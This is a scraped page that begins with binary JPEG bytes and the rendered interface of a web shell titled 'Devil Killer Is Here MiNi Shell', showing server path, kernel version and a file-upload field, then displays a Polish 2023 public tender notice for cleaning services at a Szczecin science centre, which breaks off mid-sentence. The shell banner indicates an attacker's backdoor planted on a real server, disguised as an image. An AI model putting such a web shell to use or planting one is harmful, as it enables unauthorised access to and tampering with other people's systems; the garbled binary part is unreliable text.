JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230509/0020812301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowe świadczenie usługi sprzątania w Morskim Centrum Nauki im. prof. Jerzego Stelmacha w Szczecinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Morskie Centrum Nauki im. prof. Jerzego Stelmacha w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368811319</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nad Duńczycą 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-655</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@centrumnauki.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.centrumnauki.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowe świadczenie usługi sprzątania w Morskim Centrum Nauki im. prof. Jerzego Stelmacha w Szczecinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1db5e715-ee78-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00208123</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00073828/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Kompleksowe świadczenie usług utrzymania czystości w obiekcie Morskiego Centrum Nauki im. prof. Jerzego Stalmacha w Szczecinie przy ul. Nad Duńczycą 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1db5e715-ee78-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: kompleksowe świadczenie usługi sprzątania, czyli wykonanie wszystkich czynności związanych z szeroko rozumianym pojęciem utrzymania porządku i czystości w Morskim Centrum Nauki im. prof. Jerzego Stelmacha w Szczecinie w okresie: 27.05.2023 r. - 31.01.2024 r.<br/>Miejsce świadczenia usługi: Szczecin (70-655), ul. Nad Duńczycą 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90911200-8 - Usługi sprzątania budynków</p> <p class="mb-0">90919000-2 - Usługi sprzątania biur i szkół oraz czyszczenia urządzeń biurowych</p> <p class="mb-0">90610000-6 - Usługi sprzątania i zamiatania ulic</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-05-27 do 2024-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena” (C) ocena ofert zostanie dokonana przy zastosowaniu podkryteriów cenowych wg. wzorów:<br/>Miesięczna cena ryczałtowa brutto za sprzątanie wewnątrz budynku Zamawiającego oraz terenów zewnętrznych przyległych do<br/>budynku Zamawiającego – 59 %<br/>Cn<br/>Cr = ------------ x 100 pkt x 59 %<br/>Co<br/>gdzie:<br/>Cr – liczba punktów w ramach podkryterium „Cena ryczałt”,<br/>Cn - najniższa cena spośród ofert ocenianych w podkryterium<br/>Co - cena oferty ocenianej w podkryterium<br/>b)Cenę z podatkiem VAT za 1 roboczogodzinę 1 pracownika<br/>Cn<br/>Ch = ------------ x 100 pkt x 1 %<br/>Co<br/>gdzie:<br/>Ch – liczba punktów w ramach podkryterium „Cena roboczogodziny”,<br/>Cn - najniższa cena spośród ofert ocenianych w podkryterium<br/>Co - cena oferty ocenianej w podkryterium<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu Oferty (Załącznik nr 2 do SWZ) w<br/>podkryterium Cena ryczałtowa i Cena roboczogodziny. Zamawiający po przyznaniu punktów w podkryteriach zsumuje przyznaną<br/>ilość punktów. W ramach kryterium „Cena” najwyższa możliwa do uzyskania liczba punktów to 60 (Cmax = Cr 59 + Ch 1).<br/>2)Doświadczenie koordynatora (DK)-10 pkt.<br/>Maksymalnie w kryterium „Doświadczenie koordynatora” oferta może otrzymać 10 punktów [DK].<br/>Minimalne wymagane doświadczenie koordynatora, które nabył w okresie ostatnich 6 (sześciu) lat przed upływem terminu składania<br/>ofert, zgodne z Rozdziałem VIII pkt 2 ppkt 5), wynosi 2 lata.<br/>Zamawiający przyzna ofercie w tym kryterium punkty, gdy Wykonawca wskaże w treści oferty osobę posiadającą dłuższe (ponad<br/>minimalnie wymagane 2 letnie) doświadczenie w pełnieniu funkcji koordynatora usług sprzątania w budynkach użyteczności<br/>publicznej nabyte w okresie ostatnich 6 lat przed upływem terminu składania ofert.<br/>Punkty przyznane zostaną za każdy dodatkowy rok doświadczenia ponad wymagane 2 – letnie doświadczenie wg schematu:<br/>a)3 lata doświadczenia: 3 punkty,<br/>b)4 lata doświadczenia: 7 punktów,<br/>c)6 lat doświadczenia: 10 punktów.<br/>3)Aspekty innowacyjne (A) maksymalna ilość punktów 30.<br/>Maksymalnie w kryterium „Aspekty innowacyjne” oferta może otrzymać 30 punktów [DK]. Zamawiający w tym kryterium oceniał<br/>będzie:<br/>a)zastosowanie nowych technologii, nowoczesnych rozwiązań w zakresie technik mycia i sprzątania oraz dezynfekcji :<br/>•wyposażenie pracowników Wykonawcy w urządzenia do dezynfekcji powierzchni:<br/>tak –5 pkt; nie –0 pkt<br/>•wyposażenie pracowników Wykonawcy w urządzenia do dezynfekcji pomieszczeń z możliwością użycia w obecności sprzętu<br/>elektronicznego, preparat dezynfekcyjny redukujący drobnoustroje do poziomu 10-6, urządzenie posiada udokumentowany system<br/>walidacji procesu dezynfekcji<br/>tak –10 pkt; nie–0 pkt<br/>b)rozwiązania organizacyjne<br/>•system dostarczania materiałów i sprzętu do poszczególnych pracowników przez odrębny personel za pomocą zamykanych<br/>wózków podlegających dezynfekcji (min. 2 szt.):<br/>tak-5 pkt;Nie-0 pkt.<br/>•wyposażenie pracowników w wózki serwisowe z zamykanymi pojemnikami na ściereczki, mopy i odpady:<br/>tak-5 pkt;nie-0 pkt.<br/>•wyposażenie pracowników w zamykane pojemniki podlegające dezynfekcji do przechowywania ścierek i mopów<br/>tak-5 pkt. nie-0 pkt.<br/>2.Ocena końcowa oferty:<br/>OK = C + DK + A<br/>Gdzie:<br/>Ok–ocena końcowa oferty,<br/>C–ilość punktów przyznanych w kryterium cena (suma z podkryteriów),<br/>DK-ilość punktów przyznanych w kryterium Doświadczenie Koordynatora,<br/>A–ilość punktów przyznanych w kryterium aspekty innowacyjne.<br/>3.Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów w/w kryteriach oceny<br/>ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty innowacyjne <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty innowacyjne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie formułuje warunku udziału w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie formułuje warunku udziału w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej.<br/>Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej lub finansowej zapewniającej należyte wykonanie<br/>zamówienia, jeżeli wykonawca wykaże, że:<br/>a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzo-nej działalności związanej z przedmiotem<br/>zamówienia na sumę gwaran-cyjną co najmniej 500 000,00 zł (pięćset tysięcy złotych),<br/>b) jego minimalny roczny przychód, w tym w zakresie działalności objętej zamówieniem w okresie ostatnich 3 lat<br/>obrotowych, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wyniósł mini-mum 500.000,00 zł (pięćset<br/>tysięcy złotych).<br/>c) posiada środki finansowe lub zdolność kredytową w wysokości nie niż-szej niż 500.000,00 zł (pięćset tysięcy złotych).<br/>4) zdolności technicznej lub zawodowej.<br/>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca wykaże, że należycie wykonał w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, a<br/>w przypadku świadczeń powtarzających się lub ciągłych wykonuje należycie co najmniej dwie usługi odpowiadającą swoim<br/>rodzajem i wartością przedmiotowi zamówienia.<br/>Za jedną taką usługę zamawiający rozumie usługę w zakresie sprzątania budynku użyteczności publicznej, o powierzchni<br/>użytkowej nie mniejszej niż 2.500 m2, przez okres ciągły, nie krótszy niż 12 miesięcy.<br/>Wartość co najmniej jednej z usług nie może być mniejsza niż 600 000 zł brutto (sześćset tysięcy złotych).<br/>Usługi muszą być realizowane w oparciu o odrębne umowy, lub w oparciu o jedną umowę realizowaną przez kolejne 24<br/>miesiące.<br/>W przypadku umów będących w trakcie wykonywania, za spełniające warunek zamawiający uzna umowy, których termin<br/>wykonania został zrealizowany w okresie 12 miesięcy (dla 1 usługi) lub 24 miesięcy (dla 2 usług) oraz ich wykonanie<br/>rzeczowe wyniosło co najmniej 600 000 zł brutto (sześćset tysięcy złotych).<br/>Przez pojęcie budynku użyteczności publicznej Zamawiający rozumie budynek o kategorii zgodnej z § 3 pkt 6<br/>rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać<br/>budynki i ich usytuowanie, a mianowicie: przez budynek użyteczności publicznej należy rozumieć budynek przeznaczony na<br/>potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki,<br/>wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług w tym usług<br/>pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym<br/>lub wodnym śródlądowym oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności<br/>publicznej uznaje się także budynek biurowy lub socjalny.<br/>5) W zakresie dysponowania odpowiednim potencjałem technicznym oraz osobami skierowanymi do realizacji zamówienia<br/>umożliwiające realizację zamówienia na odpowiednim poziomie jakości Zamawiający wymaga, aby Wykonawca spełnił<br/>następujące oczekiwania:<br/>Do wykonania zamówienia dysponuje lub będzie dysponował minimum jedną osobą realizującą zadania Koordynatora, który<br/>będzie uczestniczył w realizacji przedmiotu zamówienia i wykonywał prace związane z kontrolą (nadzorem) jakości<br/>świadczonych usług, posiadającą co najmniej 2 lata doświadczenia w kontroli jakości nadzorowania świadczenia usług<br/>sprzątania pomieszczeń w budynkach użyteczności publicznej, w tym pomieszczeń biurowych (na stanowisku<br/>Koordynatora).<br/>Przez pojęcie budynku użyteczności publicznej Zamawiający rozumie budynek o kategorii zgodnej z § 3 pkt 6<br/>rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać<br/>budynki i ich usytuowanie, a mianowicie: przez budynek użyteczności publicznej należy rozumieć budynek przeznaczony na<br/>potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki,<br/>wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług w tym usług<br/>pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym<br/>lub wodnym śródlądowym oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności<br/>publicznej uznaje się także budynek biurowy lub socjalny.<br/>Sposób spełniania warunków określonych w pkt. 2 ppkt 1 – 5 przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia:<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, Zamawiający wymaga aby<br/>wyżej wymienione warunki udziału w postępowaniu wykonawcy spełniali łącznie.<br/>Usługi zrealizowane w ramach świadczenia ciągłego i będące w trakcie realizacji, powinny spełniać opisany przez<br/>Zamawiającego warunek i zostać wykonane na kwoty wskazane w opisie warunku. W przypadku usług ciągłych, ich ocena<br/>dokonana zostanie w zakresie faktycznie wykonanego fragmentu usługi, który winien odpowiadać wartości i zakresowi<br/>warunku określonego w SWZ.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) mogą wykazać się doświadczeniem<br/>wykonywania usług opisanych powyżej, w których brali udział jako konsorcjum. W przypadku, gdy Wykonawca wykaże, na<br/>potwierdzenie spełnienia powyższego warunku udziału w Postępowaniu, usługę, przy realizacji której brał udział jako<br/>członek konsorcjum, z dowodów czy usługi zostały wykonane należycie, powinien wynikać zakres prac wykonanych przez<br/>Wykonawcę jako członka konsorcjum. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)informację z Krajowego Rejestru Karnego w zakresie:<br/>a)art. 108 ust. 1 pkt 4 PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>b)art.108 ust. 1 pkt. 1 i 2 PZP, sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>2)oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi Załącznik nr 5 do SWZ),<br/>3)odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>4)oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym, o którym mowa w art. 125 ust. 1 PZP - w zakresie braku podstaw wykluczenia z postępowania na podstawie:<br/>a)art. 108 ust. 1 pkt 3 PZP<br/>b)art. 108 ust. 1 pkt 4 PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c)art. 108 ust. 1 pkt 5 PZP dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)art. 108 ust. 1 pkt 6 PZP<br/>e)art. 109 ust. 1 pkt 7 PZP, oraz<br/>f)art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Załącznik nr 11 do SWZ.<br/>5)oświadczenie wykonawcy o rocznym przychodzie wykonawcy lub o przychodzie wykonawcy w obszarze objętym zamówieniem, za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;<br/>6)informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>7) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przed-miotem zamówienia na sumę gwarancyjną określoną przez zamawiającego.<br/>8)wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a 